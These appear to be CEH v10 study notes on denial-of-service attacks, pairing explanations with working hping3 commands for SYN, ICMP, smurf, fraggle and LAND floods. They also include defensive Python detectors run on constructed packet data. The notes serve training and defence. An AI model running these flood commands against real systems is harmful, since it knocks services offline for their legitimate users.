[ Certified Ethical Hacker v10 ] :: [ Chapter 10 cont’d] :: Denial of Service

Chapter 10 Continued: Denial of Service

What It Looks Like

Digital Attack Map:
https://digitalattackmap.com/#anim=1&color=0&country=ALL&list=0&time=18400&view=map

The VLS DDoS Attack, visualized with ApachePong / Logstalgia:
https://www.youtube.com/watch?v=hNjdBSoIa8k
https://logstalgia.io

Low Orbit Ion Cannon: a classic DDoS tool:


https://en.wikipedia.org/wiki/Low_Orbit_Ion_Cannon

DoS Attack Types

  1. Fragmentation
  2. Volumetric
  3. Application
  4. TCP state-exhaustion

Example DoS Attacks

  • SYN attack
  • SYN flood
  • ICMP flood
  • Smurfing
  • Ping of Death
  • Teardrop
  • LAND attack
  • Peer to Peer
  • Permanent

DDoS Tools

  • Trinity (IRC-controlled agent/handler tool)
  • Tribe Flood Network (TFN, agent/handler tool for SYN, UDP, ICMP and smurf floods)
  • RUDY (R-U-Dead-Yet, slow HTTP POST)
  • Slowloris (slow, never-finished HTTP headers that tie up server connection slots)

Types of Attacks

Service request flood

Simply make a very large number of requests (millions of page requests, for instance) so that the server's capacity to answer legitimate ones is consumed. See the effects:
https://www.youtube.com/watch?v=hNjdBSoIa8k

SYN attack/flood:

hping3 -i u1 -S -p 80 <target ip>

-S sets the SYN flag, -p 80 targets port 80, -i u1 sends one packet every microsecond (the u prefix gives the interval in microseconds). Each SYN leaves a half-open connection in the target's listen backlog until it times out; when the source address is spoofed as well, the SYN-ACKs go to hosts that never complete the handshake, so the backlog never drains.
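The half-open backlog that command produces is what a defender watches for. The following is an added example, not from the CEH notes or from hping3: it replays TCP handshakes from constructed packet summaries and alerts when one service accumulates half-open connections from many distinct sources. The record format, addresses and thresholds are assumptions for the demo.

```python
"""SYN-flood detector over a stream of TCP packet summaries.

Added example for these notes, not a CEH or hping3 artifact. The packet
records below are constructed; in practice they would come from a pcap
or flow export. Each record is
    (time_s, src_ip, src_port, dst_ip, dst_port, flags)
with flags "S" (SYN), "SA" (SYN-ACK) or "A" (handshake ACK).
"""
from collections import defaultdict

# Demo thresholds (assumptions, tune per service): alert when this many
# connections to one service are stuck half-open.
HALF_OPEN_THRESHOLD = 5
WINDOW_SECONDS = 2.0


def track_handshakes(packets):
    """Replay the three-way handshake per 4-tuple and summarise per service.

    A connection is half-open from the client's SYN until the client's ACK
    arrives; a spoofed-source SYN flood leaves them there because the
    forged sources never answer the SYN-ACK.
    """
    state = {}  # (src, sport, dst, dport) -> "syn" | "synack" | "open"
    per_service = defaultdict(
        lambda: {"half_open": 0, "completed": 0, "sources": set(), "syn_times": []}
    )
    for t, src, sport, dst, dport, flags in packets:
        if flags == "S":
            state[(src, sport, dst, dport)] = "syn"
            svc = per_service[(dst, dport)]
            svc["sources"].add(src)
            svc["syn_times"].append(t)
        elif flags == "SA":
            # Server -> client; map back to the client->server key.
            key = (dst, dport, src, sport)
            if key in state:
                state[key] = "synack"
        elif flags == "A":
            key = (src, sport, dst, dport)
            if state.get(key) == "synack":
                state[key] = "open"
                per_service[(dst, dport)]["completed"] += 1
    for (src, sport, dst, dport), st in state.items():
        if st != "open":
            per_service[(dst, dport)]["half_open"] += 1
    return per_service


def peak_syn_rate(times, window):
    """Largest number of SYNs seen in any sliding window of `window` seconds."""
    times = sorted(times)
    best = start = 0
    for end in range(len(times)):
        while times[end] - times[start] > window:
            start += 1
        best = max(best, end - start + 1)
    return best


def find_syn_floods(packets, half_open_threshold=HALF_OPEN_THRESHOLD, window=WINDOW_SECONDS):
    """Return one alert dict per service whose half-open backlog reaches the threshold."""
    alerts = []
    for (dst, dport), svc in sorted(track_handshakes(packets).items()):
        if svc["half_open"] >= half_open_threshold:
            alerts.append({
                "service": f"{dst}:{dport}",
                "half_open": svc["half_open"],
                "completed": svc["completed"],
                "unique_sources": len(svc["sources"]),
                "peak_syn_rate": peak_syn_rate(svc["syn_times"], window),
            })
    return alerts


# Constructed traffic: a legitimate HTTP and SSH handshake, then eight SYNs
# from different (spoofed) sources to port 80 that never complete.
SAMPLE_PACKETS = [
    (0.00, "10.0.0.5", 51000, "192.0.2.10", 80, "S"),
    (0.01, "192.0.2.10", 80, "10.0.0.5", 51000, "SA"),
    (0.02, "10.0.0.5", 51000, "192.0.2.10", 80, "A"),
    (0.10, "10.0.0.6", 52000, "192.0.2.10", 22, "S"),
    (0.11, "192.0.2.10", 22, "10.0.0.6", 52000, "SA"),
    (0.12, "10.0.0.6", 52000, "192.0.2.10", 22, "A"),
]
for _i in range(8):
    _src = f"203.0.113.{_i + 1}"
    SAMPLE_PACKETS.append((1.0 + 0.05 * _i, _src, 40000 + _i, "192.0.2.10", 80, "S"))
    SAMPLE_PACKETS.append((1.005 + 0.05 * _i, "192.0.2.10", 80, _src, 40000 + _i, "SA"))

if __name__ == "__main__":
    for alert in find_syn_floods(SAMPLE_PACKETS):
        print(alert)
```

On the sample the web service alerts with eight half-open connections against one completed handshake and nine distinct sources, while SSH stays quiet. The ratio of half-open to completed and the number of sources that only ever send a single SYN are the two signals that separate a spoofed flood from a busy but healthy service.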

ICMP floods

These include Smurfing, ICMP flooding and ping flooding.

A simple ICMP flood (-1 selects ICMP mode, --flood sends as fast as possible without waiting for replies, -a forges the source address):

hping3 -1 --flood -a <target ip> <broadcast ip>

With the source forged as the target and a broadcast address as the destination this is really the smurf form: every host on that segment answers the target. To flood a host directly, leave out -a and give the target as the destination instead of the broadcast address.

Ping of Death (note that this no longer works)

From a Windows machine:

ping -l 65500 <target ip> -w 1 -n 1

-l 65500 is the payload size (the largest Windows ping accepts), -n 1 sends a single request, -w 1 waits only 1 ms for the reply. The original attack sent an ICMP echo whose fragments reassembled to more than the 65535-byte maximum IP datagram, overflowing the reassembly buffer on 1990s stacks. Modern stacks reject such a datagram, and 65500 bytes of data plus the 8-byte ICMP and 20-byte IP headers is only 65528 bytes, so this command is not even oversized.

Teardrop attack

This sends IP fragments whose fragment offsets overlap: the second fragment claims to start inside the data the first one already delivered, so the receiver's reassembly code computes a bad (negative) length and, on unpatched stacks, crashes.
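To see why both Ping of Death and Teardrop live in the fragment reassembly code, here is an added example (not CEH material and not from any tool the notes mention) that classifies a fragment set the way a receiver's reassembly buffer would, flagging the overlapping offsets of Teardrop and the over-length reassembly of Ping of Death. The fragment tuples and sizes are constructed for the demo; the header limits are the real IPv4 ones.

```python
"""Check IP fragment sets the way a reassembly buffer would.

Added example for these notes (not CEH material). A fragment is modelled as
(offset_units, payload_len, more_fragments), mirroring the IP header: the
offset is in 8-byte units, payload_len counts bytes after the IP header,
more_fragments is the MF flag. The 16-bit total-length field caps a
reassembled datagram, header included, at 65535 bytes.
"""
IP_MAX_DATAGRAM = 65535
IP_HEADER_LEN = 20                               # assumes no IP options
MAX_PAYLOAD = IP_MAX_DATAGRAM - IP_HEADER_LEN     # 65515


def classify_fragments(fragments):
    """Return sorted unique findings, or [] when the set reassembles cleanly.

    "overlap"    a fragment starts inside data already covered (Teardrop)
    "gap"        a hole that can never be filled
    "bad_length" a non-final fragment whose length is not a multiple of 8
    "oversized"  reassembled payload exceeds what the IP length field can hold
                 (Ping of Death)
    """
    findings = set()
    expected_next = 0
    for offset_units, length, more in sorted(fragments, key=lambda f: f[0]):
        start = offset_units * 8
        end = start + length
        if start < expected_next:
            findings.add("overlap")
        elif start > expected_next:
            findings.add("gap")
        expected_next = max(expected_next, end)
        if more and length % 8:
            findings.add("bad_length")
    if expected_next > MAX_PAYLOAD:
        findings.add("oversized")
    return sorted(findings)


def ip_fragments(payload_len, mtu=1500):
    """Split a datagram payload into conforming fragments for an MTU (constructed input)."""
    chunk = mtu - IP_HEADER_LEN    # 1480 bytes, a multiple of 8 as the standard requires
    frags, offset = [], 0
    while offset < payload_len:
        length = min(chunk, payload_len - offset)
        more = 1 if offset + length < payload_len else 0
        frags.append((offset // 8, length, more))
        offset += length
    return frags


# Teardrop: the second fragment claims to start 24 bytes in, inside the
# 40 bytes the first fragment already delivered.
TEARDROP = [(0, 40, 1), (3, 8, 0)]
# Ping of Death as originally sent: an ICMP echo with 65510 data bytes plus
# the 8-byte ICMP header reassembles to 65518 payload bytes, over the limit.
PING_OF_DEATH = ip_fragments(65510 + 8)
# The Windows command in the notes: ping -l 65500 stays within the limit.
WINDOWS_MAX_PING = ip_fragments(65500 + 8)

if __name__ == "__main__":
    print("teardrop      ", classify_fragments(TEARDROP))
    print("ping of death ", classify_fragments(PING_OF_DEATH))
    print("ping -l 65500 ", classify_fragments(WINDOWS_MAX_PING))
```

The same checks (overlap, total length, a hole that never closes) are exactly what a modern IP stack or a stateful firewall applies before handing a reassembled datagram upward, which is why both attacks stopped working once those checks were added.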

Amplification attacks, which include:

Smurf attack

hping3 --icmp --spoof <target ip> <broadcast ip>

The source address is forged as the victim (--spoof) and the echo request goes to a directed broadcast address, so every host on that segment replies to the victim: one packet in, many packets out.

Fraggle attack

hping3 --udp --spoof <target ip> <broadcast ip>

The UDP variant. The reflectors are the UDP echo (port 7) and chargen (port 19) services, so the destination port should be set with -p 7 or -p 19 (hping3 otherwise sends to port 0). Both attacks depend on the border router forwarding directed broadcasts onto the segment.

LAND attack (Local Area Network Denial)
(modern operating systems are not susceptible: a packet whose source address and port equal its destination is dropped)

hping3 -V -c 1000000 -d 120 -S -w 64 -p 445 -s 445 -k --flood -a <target ip> <target ip>

A LAND packet is a SYN whose source address and port equal its destination address and port, so the victim ends up answering itself. -a <target ip> forges the source as the target, -p 445 -s 445 set destination and source port to 445 and -k keeps the source port fixed (hping3 otherwise increments it for every packet), -S sets SYN, -d 120 adds 120 bytes of data, -w 64 sets the TCP window, -c 1000000 is the packet count, -V is verbose output. Note that with --rand-source in place of -a <target ip> the packets carry random source addresses, which makes this an ordinary SYN flood rather than LAND.

https://en.wikipedia.org/wiki/LAND
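From the defender's side, smurf, fraggle and LAND are all recognisable from packet headers alone. The following added example (not from CEH or hping3) checks decoded packets against those three signatures and separates reflection attempts with a spoofed off-net source from a local host that merely pinged the broadcast address. The packet dicts and the local network 192.0.2.0/24 are constructed assumptions.

```python
"""Signature checks for smurf, fraggle and LAND packets.

Added example for these notes, not from CEH or hping3. Packets are plain
dicts constructed below (a real deployment would decode them from a pcap).
The local network list is an assumption standing in for the segment whose
broadcast address an attacker would aim at.
"""
import ipaddress
from collections import Counter

LOCAL_NETWORKS = [ipaddress.ip_network("192.0.2.0/24")]  # assumed amplifier segment
FRAGGLE_PORTS = {7, 19}      # UDP echo and chargen, the classic fraggle reflectors
ICMP_ECHO_REQUEST = 8


def is_broadcast(addr):
    """True for the limited broadcast or the directed broadcast of a local network."""
    ip = ipaddress.ip_address(addr)
    if ip == ipaddress.IPv4Address("255.255.255.255"):
        return True
    return any(ip == net.broadcast_address for net in LOCAL_NETWORKS)


def is_local(addr):
    ip = ipaddress.ip_address(addr)
    return any(ip in net for net in LOCAL_NETWORKS)


def classify_packet(pkt):
    """Return "land", "smurf", "fraggle" or None for one decoded packet.

    pkt has proto ("tcp" | "udp" | "icmp"), src, dst; tcp/udp add sport/dport,
    icmp adds icmp_type.
    """
    proto = pkt["proto"]
    # LAND: source and destination address and port all identical, so the
    # victim's SYN-ACK is addressed to itself.
    if proto == "tcp" and pkt["src"] == pkt["dst"] and pkt["sport"] == pkt["dport"]:
        return "land"
    if is_broadcast(pkt["dst"]):
        # Smurf: echo request to a broadcast address; every host answers the
        # (possibly forged) source. Fraggle is the UDP echo/chargen variant.
        if proto == "icmp" and pkt["icmp_type"] == ICMP_ECHO_REQUEST:
            return "smurf"
        if proto == "udp" and pkt["dport"] in FRAGGLE_PORTS:
            return "fraggle"
    return None


def summarize(packets):
    """Count signatures over a capture. A smurf/fraggle packet whose source lies
    outside the local networks is marked _spoofed_source: a remote victim is
    being reflected at, which is the attack proper."""
    counts = Counter()
    for pkt in packets:
        label = classify_packet(pkt)
        if label is None:
            continue
        if label in ("smurf", "fraggle") and not is_local(pkt["src"]):
            label += "_spoofed_source"
        counts[label] += 1
    return dict(counts)


# Constructed sample capture.
SAMPLE_PACKETS = [
    # ordinary ping and web traffic
    {"proto": "icmp", "src": "192.0.2.5", "dst": "192.0.2.10", "icmp_type": 8},
    {"proto": "tcp", "src": "192.0.2.5", "dst": "192.0.2.10", "sport": 50001, "dport": 80},
    # smurf: hping3 --icmp --spoof <target> <broadcast>, seen on the amplifier segment
    {"proto": "icmp", "src": "198.51.100.7", "dst": "192.0.2.255", "icmp_type": 8},
    {"proto": "icmp", "src": "198.51.100.7", "dst": "192.0.2.255", "icmp_type": 8},
    # fraggle: hping3 --udp --spoof <target> <broadcast> -p 7
    {"proto": "udp", "src": "198.51.100.7", "dst": "192.0.2.255", "sport": 7, "dport": 7},
    # LAND: src == dst and sport == dport
    {"proto": "tcp", "src": "192.0.2.10", "dst": "192.0.2.10", "sport": 445, "dport": 445},
    # a local host pinging the broadcast address is flagged but not spoofed
    {"proto": "icmp", "src": "192.0.2.5", "dst": "192.0.2.255", "icmp_type": 8},
]

if __name__ == "__main__":
    for pkt in SAMPLE_PACKETS:
        print(classify_packet(pkt), pkt)
    print(summarize(SAMPLE_PACKETS))
```

The amplifier side of smurf and fraggle only exists if the router forwards directed broadcasts onto the segment; disabling that on border interfaces (on Cisco IOS, no ip directed-broadcast) removes the network as a reflector, and ingress filtering that drops packets whose source is not a local address stops the spoofed packets leaving in the first place.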

Permanent DoS attacks

Phlashing is flashing malicious or corrupt code into the BIOS or any other firmware location so the device no longer boots. For most people this is irrecoverable short of replacing the hardware or reflashing the chip with a programmer.

Application-level attacks

Flooding the application with requests (HTTP GET/POST floods, for instance), which exhausts the server's threads or connection slots rather than the link's bandwidth.

Disrupting services, for instance the login service: making many failed attempts against known usernames so that the accounts get locked out and legitimate users cannot sign in.

Jamming the application's database connection, usually by submitting crafted SQL queries that lock tables or corrupt the database.